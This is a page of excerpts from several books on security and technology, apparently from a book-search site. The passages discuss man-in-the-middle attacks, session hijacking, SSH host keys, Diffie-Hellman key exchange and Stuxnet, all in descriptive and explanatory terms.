Application's Content 795 1.1 Explore Visible Content 795 1.2 Consult Public Resources 796 1.3 Discover Hidden Content 796 1.4 Discover Default Content 797 1.5 Enumerate Identifier-Specified Functions 797 1.6 Test for Debug Parameters 798 2 Analyze the Application 798 2.1 Identify Functionality 798 2.2 Identify Data Entry Points 799 2.3 Identify the Technologies Used 799 2.4 Map the Attack Surface 800 3 Test Client-Side Controls 800 3.1 Test Transmission of Data Via the Client 801 3.2 Test Client-Side Controls Over User Input 801 3.3 Test Browser Extension Components 802 4 Test the Authentication Mechanism 805 4.1 Understand the Mechanism 805 4.2 Test Password Quality 806 4.3 Test for Username Enumeration 806 4.4 Test Resilience to Password Guessing 807 4.5 Test Any Account Recovery Function 807 4.6 Test Any Remember Me Function 808 4.7 Test Any Impersonation Function 808 4.8 Test Username Uniqueness 809 4.9 Test Predictability of Autogenerated Credentials 809 4.10 Check for Unsafe Transmission of Credentials 810 4.11 Check for Unsafe Distribution of Credentials 810 4.12 Test for Insecure Storage 811 4.13 Test for Logic Flaws 811 4.14 Exploit Any Vulnerabilities to Gain Unauthorized Access 813 5 Test the Session Management Mechanism 814 5.1 Understand the Mechanism 814 5.2 Test Tokens for Meaning 815 5.3 Test Tokens for Predictability 816 xx Contents 5.4 Check for Insecure Transmission of Tokens 817 5.5 Check for Disclosure of Tokens in Logs 817 5.6 Check Mapping of Tokens to Sessions 818 5.7 Test Session Termination 818 5.8 Check for Session Fixation 819 5.9 Check for CSRF 820 5.10 Check Cookie Scope 820 6 Test Access Controls 821 6.1 Understand the Access Control Requirements 821 6.2 Test with Multiple Accounts 822 6.3 Test with Limited Access 822 6.4 Test for Insecure Access Control Methods 823 7 Test for Input-Based Vulnerabilities 824 7.1 Fuzz All Request Parameters 824 7.2 Test for SQL Injection 827 7.3 Test for XSS and Other Response Injection 829 7.4 Test for OS Command Injection 832 7.5 Test for Path Traversal 833 7.6 Test for Script Injection 835 7.7 Test for File Inclusion 835 8 Test for Function-Specific Input Vulnerabilities 836 8.1 Test for SMTP Injection 836 8.2 Test for Native Software Vulnerabilities 837 8.3 Test for SOAP Injection 839 8.4 Test for LDAP Injection 839 8.5 Test for XPath Injection 840 8.6 Test for Back-End Request Injection 841 8.7 Test for XXE Injection 841 9 Test for Logic Flaws 842 9.1 Identify the Key Attack Surface 842 9.2 Test Multistage Processes 842 9.3 Test Handling of Incomplete Input 843 9.4 Test Trust Boundaries 844 9.5 Test Transaction Logic 844 10 Test for Shared Hosting Vulnerabilities 845 10.1 Test Segregation in Shared Infrastructures 845 10.2 Test Segregation Between ASP-Hosted Applications 845 11 Test for Application Server Vulnerabilities 846 11.1 Test for Default Credentials 846 11.2 Test for Default Content 847 11.3 Test for Dangerous HTTP Methods 847 11.4 Test for Proxy Functionality 847 11.5 Test for Virtual Hosting Misconfiguration 847 11.6 Test for Web Server Software Bugs 848 11.7 Test for Web Application Firewalling 848 Contents xxi 12 Miscellaneous Checks 849 12.1 Check for DOM-Based Attacks 849 12.2 Check for Local Privacy Vulnerabilities 850 12.3 Check for Weak SSL Ciphers 851 12.4 Check Same-Origin Policy Configuration 851 13 Follow Up Any Information Leakage 852 Index 853 Introduction This book is a practical guide to discovering and exploiting security flaws in web applications.


pages: 273 words: 72,024

Bitcoin for the Befuddled by Conrad Barski

Airbnb, AltaVista, altcoin, bitcoin, blockchain, buttonwood tree, cryptocurrency, Debian, en.wikipedia.org, Ethereum, ethereum blockchain, fiat currency, Isaac Newton, MITM: man-in-the-middle, money: store of value / unit of account / medium of exchange, Network effects, node package manager, p-value, peer-to-peer, price discovery process, QR code, radical decentralization, Satoshi Nakamoto, self-driving car, SETI@home, software as a service, the payments system, Yogi Berra

Black hat hackers, as opposed to white hat hackers, are hackers who have no moral qualms about profiting from and harming their targets. 4. If you don’t understand what a man-in-the-middle attack is, first, be aware that almost anything you do on the Internet is at risk of this assault, especially if you’re connecting from a public Internet connection you don’t fully control. Second, stop reading this chapter now and immediately read the Wikipedia page on this subject at https://en.wikipedia.org/wiki/Man-in-the-middle_attack. Appendix B: Bitcoin Programming with Bitcoinj 1. The C++ reference implementation is available at https://github.com/bitcoin/bitcoin/. 2.

Most important, be aware that we’re using community-maintained source code in our examples; if a clever black hat hacker3 manages to insert some rogue code into the official library repositories, he or she can steal all your money. Even if you understand the library code perfectly, you run the risk of jeopardizing the safety of your money. For example, as you’re downloading this library code from the Internet, a black hat hacker has many opportunities to perform a man-in-the-middle attack4 and insert rogue code into a doctored version of the library that is incorporated into your program. As a result, the hacker can steal all your money. Additionally, as mentioned in earlier chapters, hackers can steal your bitcoins in many other ways that aren’t specific to Bitcoin programming.

program, 217–218, 220–222 hello-money starter project creating, 228–229 declarations, 231 hook for detecting money arrival, 234 running and testing, 235–236 writing code, 230–235 hierarchical deterministic wallets, 190 Hill, Austin, 120 history of Bitcoin, 112–116 homebrew (command-line tool), 219 hosted wallets online services, 36 vs. personal wallets, 34–35 hot storage, 47 vs. cold storage, 33–34 hot wallets, personal, 37–38 human-readable Bitcoin addresses, 10n hybrid wallets, 187 I illegal activity, Bitcoin and, 124 impedance mismatch, 57 importing private key, 17, 39, 193, 194–195, 237 installing SPV wallets vs. full wallets, 193 integer factorization, 131 Internet bubble, 120 InterruptedException exception type, 239 irreversibility, of transactions, 25–26, 56 superiority of, 57 J Java, 226 initializing objects, 231–233 installing, 226–227 java.io.File class, 231 Java JDK (Java Development Kit), 226 java.matho.BigInteger class, 231 JavaScript, 213–223 preparing machine for, 218–219 writing Bitcoin program in, 217–218 jelly-filled donut incident, 141–156 JSON-RPC API (JavaScript Object Notation - Remote Protocol Call), 222 limitations of writing Bitcoin programs using, 223 JSON-RPC protocol, 214 K Kaminsky, Dan, 118 Keynesian economics, 126 Kienzle, Jörg, 110–111 Koblitz curve, 151 Kraken, 64 Krugman, Paul, 117 L Landauer limit, 157 laptops, private keys on, 44 ledger, 11 length extension, 171n liability, for stolen bitcoins, 34 lightweight wallets, 192 limit orders, 66 Linux installing Git, 227 installing Maven, 227 OpenJDK version of Java, 227 setting up Bitcoin Core server, 219 live Bitcoin exchanges, 71 LocalBitcoins.com, 67, 68 escrow service, 70 M Mac OS installing Git, 227 installing Maven, 227 setting up Bitcoin Core server, 219 man-in-the-middle attacks, 216 market orders, 65–66 MasterCard, 112 master private key, 188 master public key, 188 generating Bitcoin address with, 190 Maven empty starter project created with, 228 installing, 227 mBTC (millibitcoins), 9 MD5 (message digest algorithm), 132 meeting places, for Bitcoin transactions, 68 MemoryBlockStore function (bitcoinJ), 237 merchant services, 214 Merkle trees, 192 mesh networks, 169 message digest algorithm (MD5), 132 microbitcoins (µBTC), 9 middleman, buying bitcoins from, 52–57 Miller-Rabin primality test, 90 millibitcoins (mBTC), 9 mining, 5, 20, 26–27, 96, 99, 161–180 in 2030, 201–202 decentralization of, 179–180 difficulty of, 173 distributing new currency with, 167–168 hardware, 174–175 2030 requirements, 202 energy efficiency of, 178 profitability threshold curves for comparing, 179 need for, 162–168 nodes, 170 pooled, 175–176 practicality, 50 preventing attacks with, 166–167 process for, 168–176 for profit, 176–177 proof-of-work in, 138–139 solving a block, 171 modular arithmetic, 131n “m of n” private key, 42 money laundering, 112–113 Moore’s law, 179n Moxie Jean, 67 Multibit, 38 multi-signature addresses, and fragmented private keys, 41–42 multi-signature transactions, 57, 69–70 mvn install command, 230 My Wallet Service, 37 N Nakamoto, Satoshi, 3, 110, 211 identity, 113 last comment, 114 white paper on Bitcoin, 112 network effect, 120 NetworkParameters structure, 232 newbiecoins.com, 13 newly minted bitcoins, 26–27 Newton, Isaac, Principia, 210–211 node-bitcoin, installing, 218 Node.js library, 217, 221 installing, 218 Node Package Manager, 218 nodes broadcast only, 169 full, 191 relay, 170 nominal deflation, 126 nonprofit organizations, accepting bitcoins, 18 NXT, 125 O off-chain transactions, 201 offline transaction signing, 40–41 onCoinsReceived function, 234–235 online wallet services hosted, 36 personal, 34, 37 Oracle Corporation, 226 orders, placing to buy bitcoins, 65 order of curve, elliptic curve cryptography, 152–153 orphaned blocks, 24–25 P paper money, color copiers as threat, 110 paper wallets, 39 encrypted, 39–40 passwords, 14, 40 for brain wallet, 45 function of, 40 loss of, 37 Peercoin, 125 PeerGroup object, 233–234, 240 peer-to-peer architecture, 119 pegging, 120 pending transaction, 18 Perrig, Adrian, 110–111 personal wallets vs. hosted wallet, 34–35 hot storage, 37–38 online services, 37 person-to-person bitcoin purchases, 52, 67–71 point multiplication, 150, 158–159 point-of-sale terminals, watch-only wallet for, 187 polling, Bitcoin programming, 223 pom.xml file, 229, 236–237 pooled mining, 175–176 portability, of currency, 117 Preneel, Bart, 140 price discovery process, 120 privacy, 11n and criminals, 124 multiple addresses and, 12 private currencies, 2 private key, 11–12, 150 compromise of, 41 extra protection for, 139 fragmented, and multi-signature addresses, 41–42 generating, 37 importing, 237 master, 188 memorizing, 45 parable on, 141–145 reversing function of, 136 security for, 39, 186 signing transaction with, 156 SPV wallets vs. full wallets, 194 storing, 33 profit, mining for, 176–177 programming languages, for Bitcoin network connection, 225–226 proof-of-stake, 125 proof-of-work, 125, 166 and blockchain, 165 in mining, 138–139 protecting bitcoins, 61.


pages: 677 words: 206,548

Future Crimes: Everything Is Connected, Everyone Is Vulnerable and What We Can Do About It by Marc Goodman

23andMe, 3D printing, active measures, additive manufacturing, Affordable Care Act / Obamacare, Airbnb, airport security, Albert Einstein, algorithmic trading, Alvin Toffler, Apollo 11, Apollo 13, artificial general intelligence, Asilomar, Asilomar Conference on Recombinant DNA, augmented reality, autonomous vehicles, Baxter: Rethink Robotics, Bill Joy: nanobots, bitcoin, Black Swan, blockchain, borderless world, Boston Dynamics, Brian Krebs, business process, butterfly effect, call centre, Charles Lindbergh, Chelsea Manning, Citizen Lab, cloud computing, Cody Wilson, cognitive dissonance, computer vision, connected car, corporate governance, crowdsourcing, cryptocurrency, data acquisition, data is the new oil, data science, Dean Kamen, deep learning, DeepMind, digital rights, disinformation, disintermediation, Dogecoin, don't be evil, double helix, Downton Abbey, driverless car, drone strike, Edward Snowden, Elon Musk, Erik Brynjolfsson, Evgeny Morozov, Filter Bubble, Firefox, Flash crash, Free Software Foundation, future of work, game design, gamification, global pandemic, Google Chrome, Google Earth, Google Glasses, Gordon Gekko, Hacker News, high net worth, High speed trading, hive mind, Howard Rheingold, hypertext link, illegal immigration, impulse control, industrial robot, information security, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Jaron Lanier, Jeff Bezos, job automation, John Harrison: Longitude, John Markoff, Joi Ito, Jony Ive, Julian Assange, Kevin Kelly, Khan Academy, Kickstarter, Kiva Systems, knowledge worker, Kuwabatake Sanjuro: assassination market, Large Hadron Collider, Larry Ellison, Laura Poitras, Law of Accelerating Returns, Lean Startup, license plate recognition, lifelogging, litecoin, low earth orbit, M-Pesa, machine translation, Mark Zuckerberg, Marshall McLuhan, Menlo Park, Metcalfe’s law, MITM: man-in-the-middle, mobile money, more computing power than Apollo, move fast and break things, Nate Silver, national security letter, natural language processing, Nick Bostrom, obamacare, Occupy movement, Oculus Rift, off grid, off-the-grid, offshore financial centre, operational security, optical character recognition, Parag Khanna, pattern recognition, peer-to-peer, personalized medicine, Peter H. Diamandis: Planetary Resources, Peter Thiel, pre–internet, printed gun, RAND corporation, ransomware, Ray Kurzweil, Recombinant DNA, refrigerator car, RFID, ride hailing / ride sharing, Rodney Brooks, Ross Ulbricht, Russell Brand, Salesforce, Satoshi Nakamoto, Second Machine Age, security theater, self-driving car, shareholder value, Sheryl Sandberg, Silicon Valley, Silicon Valley startup, SimCity, Skype, smart cities, smart grid, smart meter, Snapchat, social graph, SoftBank, software as a service, speech recognition, stealth mode startup, Stephen Hawking, Steve Jobs, Steve Wozniak, strong AI, Stuxnet, subscription business, supply-chain management, synthetic biology, tech worker, technological singularity, TED Talk, telepresence, telepresence robot, Tesla Model S, The future is already here, The Future of Employment, the long tail, The Wisdom of Crowds, Tim Cook: Apple, trade route, uranium enrichment, Virgin Galactic, Wall-E, warehouse robotics, Watson beat the top human players on Jeopardy!, Wave and Pay, We are Anonymous. We are Legion, web application, Westphalian system, WikiLeaks, Y Combinator, you are the product, zero day

, whose data centers the spy agency infiltrated without authorization. Using the same basic techniques employed by hackers and organized crime groups, the NSA infected more than fifty thousand computer networks around the world with malicious software in order to get access to targets of interest. The agency even posed as Facebook in numerous “man in the middle” attacks to pursue individuals across their social networks. The technique caused targets of interest to connect through a replica Facebook site controlled by the government, allowing the agency to install malware on the machines of its marks. The NSA did not do all this work by itself, but rather cooperated with sister organizations such as Britain’s NSA equivalent, the Government Communications Headquarters.

The profound consequences of the “in screen we trust” mentality can open the door to an array of new crimes, including new ways to commit murder. In response, criminals have developed a panoply of methodologies to profit from a world that has subsumed human intelligence in favor of the digital and the virtual. Nefarious actors are proving particularly adept at so-called man-in-the-middle attacks, wherein they insert themselves between reality and the data we see on our screens. The result? An all-out assault on the integrity of the information we’re stockpiling as a result of the big-data revolution. Screen of the Crime For every screen in your life, criminals have developed a plan of attack.

Purchases made by criminals with your credit or debit card are automatically struck from the recent transactions list and the online statement before they appear on your screen. Even PDF copies of your banking and credit card transactions sent to your printer are modified before they come out of your machine. When these thieves own you, they really own you. These types of man-in-the-middle attacks are powerful reminders that criminal hackers are perfectly capable of intermediating reality for you via the ever-increasing number of screens in your life. Just like the perpetrators of Stuxnet, these criminals recognize that screens are merely a proxy for reality, one that is completely malleable and easily manipulated.


pages: 394 words: 117,982

The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age by David E. Sanger

active measures, air gap, autonomous vehicles, Bernie Sanders, Big Tech, bitcoin, Black Lives Matter, Bletchley Park, British Empire, call centre, Cambridge Analytica, Cass Sunstein, Chelsea Manning, computer age, cryptocurrency, cuban missile crisis, disinformation, Donald Trump, drone strike, Edward Snowden, fake news, Google Chrome, Google Earth, information security, Jacob Appelbaum, John Markoff, Kevin Roose, Laura Poitras, Mark Zuckerberg, MITM: man-in-the-middle, mutually assured destruction, off-the-grid, RAND corporation, ransomware, Sand Hill Road, Sheryl Sandberg, Silicon Valley, Silicon Valley ideology, Skype, South China Sea, Steve Bannon, Steve Jobs, Steven Levy, Stuxnet, Tim Cook: Apple, too big to fail, Twitter Arab Spring, undersea cable, unit 8200, uranium enrichment, Valery Gerasimov, WikiLeaks, zero day

ISBN 9780451497895 Ebook ISBN 9780451497918 Cover design by Oliver Munday v5.3.1 ep For Sherill, whose love and talent make all the wonderful things in life happen CONTENTS Cover Title Page Copyright Dedication PREFACE PROLOGUE: FROM RUSSIA, WITH LOVE CHAPTER I: ORIGINAL SINS CHAPTER II: PANDORA’S INBOX CHAPTER III: THE HUNDRED-DOLLAR TAKEDOWN CHAPTER IV: MAN IN THE MIDDLE CHAPTER V: THE CHINA RULES CHAPTER VI: THE KIMS STRIKE BACK CHAPTER VII: PUTIN’S PETRI DISH CHAPTER VIII: THE FUMBLE CHAPTER IX: WARNING FROM THE COTSWOLDS CHAPTER X: THE SLOW AWAKENING CHAPTER XI: THREE CRISES IN THE VALLEY CHAPTER XII: LEFT OF LAUNCH AFTERWORD ACKNOWLEDGMENTS NOTES PREFACE A year into Donald J.

“He did huge damage that we’re all paying for,” Clapper insisted. “He was a narcissistic, self-centered ideologue.” All true. But he may have also done us a favor by forcing Washington and the new giants of the Internet—Google, Facebook, Microsoft, Intel—to rethink their relationship with the US government as well. CHAPTER IV MAN IN THE MIDDLE No hard feelings, but my job is to make their job hard. —Eric Grosse, Google’s head of security, talking about the NSA It was the smiley face that got to the engineers at Google. The face was drawn at the bottom of a handwritten diagram on yellow paper that looked a bit like something an engineer might sketch at a coffee shop—save for the fact that it was on a slide marked TOP SECRET//SI//NOFORN and included in Snowden’s trove of leaked documents.

The face was drawn at the bottom of a handwritten diagram on yellow paper that looked a bit like something an engineer might sketch at a coffee shop—save for the fact that it was on a slide marked TOP SECRET//SI//NOFORN and included in Snowden’s trove of leaked documents. The diagram revealed that the NSA was trying, maybe successfully, to insert itself in the nexus between the “Public Internet” and the “Google Cloud” in a move called a “man in the middle” attack. In other words, everything that went into and came out of Google’s international data centers, connecting its customers around the world, could be intercepted. The drawing included an arrow pointing to the place in the diagram that corresponded to where the NSA was inserting itself.


pages: 761 words: 80,914

Ansible: Up and Running: Automating Configuration Management and Deployment the Easy Way by Lorin Hochstein

Amazon Web Services, cloud computing, continuous integration, Debian, DevOps, domain-specific language, don't repeat yourself, general-purpose programming language, Infrastructure as a Service, job automation, machine readable, MITM: man-in-the-middle, pull request, side project, smart transportation, web application

The output was: OpenSSH_6.2p2, OSSLShim 0.9.8r 8 Dec 2011 debug1: Reading configuration data /etc/ssh_config debug1: /etc/ssh_config line 20: Applying options for * debug1: /etc/ssh_config line 102: Applying options for * debug1: auto-mux: Trying existing master debug1: Control socket "/Users/lorinhochstein/.ansible/cp/ansible-ssh-127.0.0.1- 2222-vagrant" does not exist debug2: ssh_connect: needpriv 0 debug1: Connecting to 127.0.0.1 [127.0.0.1] port 2222. debug2: fd 3 setting O_NONBLOCK debug1: connect to address 127.0.0.1 port 2222: Connection refused ssh: connect to host 127.0.0.1 port 2222: Connection refused If you have host key verification enabled, and the host key in ~/.ssh/known_hosts doesn’t match the host key of the server, then using -vvvv will output an error that looks like this: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that a host key has just been changed. The fingerprint for the RSA key sent by the remote host is c3:99:c2:8f:18:ef:68:fe:ca:86:a9:f5:95:9e:a7:23. Please contact your system administrator. Add correct host key in /Users/lorinhochstein/.ssh/known_hosts to get rid of this message.

Cloning as root and changing permissions - name: verify the config is valid sudoers file local_action: command visudo -cf files/99-keep-ssh-auth-sock-env sudo: True - name: copy the sudoers file so we can do agent forwarding copy: > src=files/99-keep-ssh-auth-sock-env dest=/etc/sudoers.d/99-keep-ssh-auth-sock-env owner=root group=root mode=0440 validate='visudo -cf %s' sudo: True - name: check out my private git repository git: repo=git@github.com:lorin/mezzanine-example.git dest={{ proj_path }} sudo: True - name: set file ownership file: > path={{ proj_path }} state=directory recurse=yes owner={{ user }} group={{ user }} sudo: True Host Keys Every host that runs an SSH server has an associated host key. The host key acts like a signature that uniquely identifies the host. Host keys exist to prevent man-in-the-middle attacks. If you’re cloning a Git repository over SSH from GitHub, you don’t really know whether the server that claims to be github.com is really GitHub’s server, or is an impostor that used DNS spoofing to pretend to be github.com. Host keys allow you to check that the server that claims to be github.com really is github.com.

Recall in Chapter 6 how the git module took an accept_hostkey parameter: - name: check out the repository on the host git: repo={{ repo_url }} dest={{ proj_path }} accept_hostkey=yes The git module can hang when cloning a Git repository using the SSH protocol if host key checking is enabled on the host and the Git server’s SSH host key is not known to the host. The simplest approach is to use the accept_hostkey parameter to tell Git to automatically accept the host key if it isn’t known, which is the approach we use in Example 6-5. Many people simply accept the host key and don’t worry about these types of man-in-the-middle attacks. That’s what we did in our playbook, by specifying accept_hostkey=yes as an argument when invoking the git module. However, if you are more security conscious and don’t want to automatically accept the host key, then you can manually retrieve and verify GitHub’s host key, and then add it to the system-wide /etc/ssh/known_hosts file or, for a specific user, to the user’s ~/.ssh/known_hosts file.


Django Book by Matt Behrens

Benevolent Dictator For Life (BDFL), book value, business logic, create, read, update, delete, database schema, distributed revision control, don't repeat yourself, duck typing, en.wikipedia.org, Firefox, full text search, loose coupling, MITM: man-in-the-middle, MVC pattern, revision control, Ruby on Rails, school choice, slashdot, SQL injection, web application

Both the attack itself and those tools are covered in great detail in Chapter 16. Session Forging/Hijacking This isn’t a specific attack, but rather a general class of attacks on a user’s session data. It can take a number of different forms: A man-in-the-middle attack, where an attacker snoops on session data as it travels over the wire (or wireless) network. Session forging, where an attacker uses a session ID (perhaps obtained through a man-in-the-middle attack) to pretend to be another user. An example of these first two would be an attacker in a coffee shop using the shop’s wireless network to capture a session cookie. She could then use that cookie to impersonate the original user.

Because HTTP data is sent in cleartext, cookies are extremely vulnerable to snooping attacks. That is, an attacker snooping on the wire can intercept a cookie and read it. This means you should never store sensitive information in a cookie. There’s an even more insidious attack, known as a man-in-the-middle attack, wherein an attacker intercepts a cookie and uses it to pose as another user. Chapter 20 discusses attacks of this nature in depth, as well as ways to prevent it. Cookies aren’t even secure from their intended recipients. Most browsers provide easy ways to edit the content of individual cookies, and resourceful users can always use tools like mechanize (http://wwwsearch.sourceforge.net/mechanize/) to construct HTTP requests by hand.

Although it’s nearly impossible to detect someone who’s hijacked a session ID, Django does have built-in protection against a brute-force session attack. Session IDs are stored as hashes (instead of sequential numbers), which prevents a brute-force attack, and a user will always get a new session ID if she tries a nonexistent one, which prevents session fixation. Notice that none of those principles and tools prevents man-in-the-middle attacks. These types of attacks are nearly impossible to detect. If your site allows logged-in users to see any sort of sensitive data, you should always serve that site over HTTPS. Additionally, if you have an SSL-enabled site, you should set the SESSION_COOKIE_SECURE setting to True; this will make Django only send session cookies over HTTPS.


pages: 171 words: 54,334

Barefoot Into Cyberspace: Adventures in Search of Techno-Utopia by Becky Hogge, Damien Morris, Christopher Scally

"World Economic Forum" Davos, A Declaration of the Independence of Cyberspace, back-to-the-land, Berlin Wall, Buckminster Fuller, Chelsea Manning, citizen journalism, cloud computing, corporate social responsibility, disintermediation, DIY culture, Douglas Engelbart, Douglas Engelbart, Electric Kool-Aid Acid Test, Evgeny Morozov, Fall of the Berlin Wall, game design, Hacker Conference 1984, Hacker Ethic, Hans Moravec, informal economy, information asymmetry, Jacob Appelbaum, jimmy wales, John Gilmore, John Markoff, John Perry Barlow, Julian Assange, Kevin Kelly, mass immigration, Menlo Park, military-industrial complex, Mitch Kapor, MITM: man-in-the-middle, moral panic, Mother of all demos, Naomi Klein, Nelson Mandela, Network effects, New Journalism, Norbert Wiener, off-the-grid, peer-to-peer, Richard Stallman, Silicon Valley, Skype, Socratic dialogue, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, systems thinking, technoutopianism, Telecommunications Act of 1996, The Hackers Conference, Vannevar Bush, Whole Earth Catalog, Whole Earth Review, WikiLeaks

The implications are serious – a fairly simply hack has turned the world’s network of over three billion GSM mobile phones into the most widely deployed privacy threat on the planet. Karsten is offhand as he underlines the implications of his work in the introduction to his talk: Cloning, spoofing, man-in-the-middle, decrypting, sniffing, crashing, DoSing, or just plain having fun. If you can work a BitTorrent client and a standard GNU build process then you can do it all, too. Prepare to change the way you look at your cell phone, forever. If all this sounds like bragging jargon, then listen to how the BBC report the breakthrough: “The work could allow anyone – including criminals – to eavesdrop on private phone conversations”.

IM: Instant Message ISP: Internet Service Provider La Quadrature du Net: France-based organisation that works to preserve digital rights and freedoms Mailman: A computer software application for managing electronic mailing lists MAME: MAME (an acronym of Multiple Arcade Machine Emulator) is an emulator application designed to recreate the hardware of arcade game systems in software on modern personal computers and other platforms. man-in-the-middle: A form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.


Principles of Protocol Design by Robin Sharp

accounting loophole / creative accounting, business process, discrete time, exponential backoff, fault tolerance, finite state, functional programming, Gödel, Escher, Bach, information retrieval, loose coupling, MITM: man-in-the-middle, OSI model, packet switching, quantum cryptography, RFC: Request For Comment, stochastic process

Note that A’s personal secret xA is not revealed directly to B (or to any adversaries who may be listening), and it is computationally 6.5 Key Exchange a) KA A 185 B α xA α xA xB b) KA α xB A α xA xB B M α xA KB KB α xA α xB α xA xB α x A xB α xB Fig. 6.14 An attack on the Diffie-Hellman protocol. (a) Normal operation; (b) During man-in-the-middle attack Protocol 26 Message 1 A → B : α xA mod q Message 2 B → A : (α xB mod q, {SB (α xB , α xA )}K ) Message 3 A → B : {SA (α xB , α xA )}K Fig. 6.15 Station-to-Station key agreement protocol. Here, α is a publicly known integer which is a primitive root of a publicly known prime q, and xA and xB are secret integers known only to A and B respectively.

This protocol sends an encrypted, signed copy of the exponentials used 186 6 Security to evaluate the shared secret key together with the exponentials themselves. This enables the recipients to check the integrity and source of the received information. As in the three-way handshake and similar protocols, the third message confirms to B that the new key K is actually shared with A. These additional features protect the protocol against the simple man-in-the-middle attack shown in Figure 6.14. However, users of the protocol should still take care, as you will see if you try to solve Exercise 6.9. You should never underestimate the difficulty of designing a correct and secure key exchange protocol! 6.6 Non-cryptographic Methods Not all forms of security can be provided solely by the use of cryptographic methods.

When certificates are used to provide authentication, it is important that a certificate can be revoked if it is no longer valid – for example, if the key which it contains is known to be compromised, or if the owner of the certificate ceases to exist. Suggest a suitable protocol for dealing with revocation in the case of a system with multiple certification authorities, based on an hierarchical trust model. 6.9. The Station-to-Station protocol given as Protocol 26 is sensitive to a type of man-in-the-middle attack in which the attacker changes the first message from A to B, so that it looks as though it came from a third party, C. (Technically, this can be done by changing the sender address in the PDU.) B then replies to the intruder, Exercises 189 who sends the reply on to A. When A sends its third message, it belives that it is talking to B, whereas B believes it is talking to C.


pages: 492 words: 153,565

Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon by Kim Zetter

air gap, Ayatollah Khomeini, Brian Krebs, crowdsourcing, data acquisition, Doomsday Clock, drone strike, Edward Snowden, facts on the ground, false flag, Firefox, friendly fire, Google Earth, information retrieval, information security, John Markoff, Julian Assange, Kickstarter, Loma Prieta earthquake, machine readable, Maui Hawaii, military-industrial complex, MITM: man-in-the-middle, Morris worm, pre–internet, RAND corporation, rolling blackouts, Silicon Valley, skunkworks, smart grid, smart meter, South China Sea, Stuxnet, Timothy McVeigh, two and twenty, undersea cable, unit 8200, uranium enrichment, Vladimir Vetrov: Farewell Dossier, WikiLeaks, Y2K, zero day

Similarly, in the case of control systems, Langner had expected hackers would start out with simple denial-of-service attacks—sending a stop command to a PLC to halt whatever process it controlled—then escalate to logic bombs and other simple techniques to alter settings. But Stuxnet bypassed the rudimentary stages of development and jumped straight into one of the most sophisticated attacks someone could devise against a PLC. Of everything that Langner saw in the code, it was the man-in-the-middle attack against the safety system and operator monitoring stations that really blew his mind. The way Stuxnet smoothly disabled the former and deviously recorded the normal operations of the PLC to play them back to operators during the attack was astounding to him—the digital equivalent of a six-ton circus elephant performing a one-legged handstand.

Once the attack was done, it recycled itself and began again. This meant that rather than launching a single blow that caused catastrophic failure, as the researchers originally believed Stuxnet was designed to do, the attackers were going for subtle sabotage that extended over time. This, combined with the man-in-the-middle attack that concealed the sabotage from operators as it occurred, would have made it hard for anyone to detect and pinpoint the source of problems. The attackers, Falliere realized, had expected to go undetected for months, and indeed they had. The first part of the attack, a reconnaissance stage, lasted about thirteen days, during which Stuxnet sat silently on the PLC recording normal operations in order to loop that data back to operators when the sabotage began.

After the initial reconnaissance stage recording data for thirteen days, Stuxnet first increased the frequency of the converters to 1,410 Hz for fifteen minutes, then reduced it to 1,064 Hz, presumably the normal operating frequency, for about twenty-six days. Once Stuxnet recorded all of the data it needed to record during these three weeks, it dropped the frequency drastically to 2 Hz for fifty minutes, before restoring it to 1,064 Hz again. After another twenty-six days, the attack began again. Each time the sabotage commenced, the man-in-the-middle attack fed false frequency readings back to the operators and safety system to keep them blind to what was happening. SYMANTEC AT LAST knew exactly what Stuxnet was doing to the S7-315 PLC. But the attack targeting the S7-417 PLC remained a mystery. The two digital weapons arrived with the same missile but operated completely independent of each other.


pages: 2,054 words: 359,149

The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities by Justin Schuh

address space layout randomization, Albert Einstein, Any sufficiently advanced technology is indistinguishable from magic, bash_history, business logic, business process, database schema, Debian, defense in depth, en.wikipedia.org, Firefox, information retrieval, information security, iterative process, Ken Thompson, loose coupling, MITM: man-in-the-middle, Multics, MVC pattern, off-by-one error, operational security, OSI model, RFC: Request For Comment, slashdot, SQL injection, web application

First, the implementation should use a standard key exchange protocol, such as RSA, Diffie-Hellman, or El Gamal. These algorithms have been extensively validated and provide the best degree of assurance. The next concern is that the key exchange is performed in a secure manner, which means both sides of the communication must provide some means of identification to prevent man-in-the-middle attacks. All the key exchange algorithms mentioned previously provide associated signature algorithms that can be used to validate both sides of the connection. These algorithms require that both parties have already exchanged public keys or that they are available through some trusted source, such as a Public Key Infrastructure (PKI) server.

The client, therefore, has no way of knowing whether the certificate can be trusted. If users browse to the site, they get an error message stating that the certificate isn’t signed by a trusted authority; the only option is to accept the untrusted certificate or terminate the connection. An attacker capable of spoofing the server could exploit this situation to stage man-in-the-middle attacks and then hijack sessions or steal credentials. Network Profiles An application’s network profile is a crucial consideration when you’re reviewing operational security. Protocols such as Network File System (NFS) and Server Message Block (SMB) are acceptable inside the corporate firewall and generally are an absolute necessity.

In performing an audit, often you assume the effectiveness of a publicly validated encryption protocol. However, that doesn’t necessarily mean the protocol is being used safely. You might want to look at session establishment and see whether an observer can learn secret keys from watching a proposal and session setup. Man in the middle—Can an observer masquerade as a server and glean login credentials from clients without their knowledge? Protocol quirks—What interesting quirks does the protocol allow? For example, does it provide backward compatibility with previous, less secure versions of the protocol? If so, undermining security by forcing the use of old protocol features or authentication mechanisms might be possible.


Smart Grid Standards by Takuro Sato

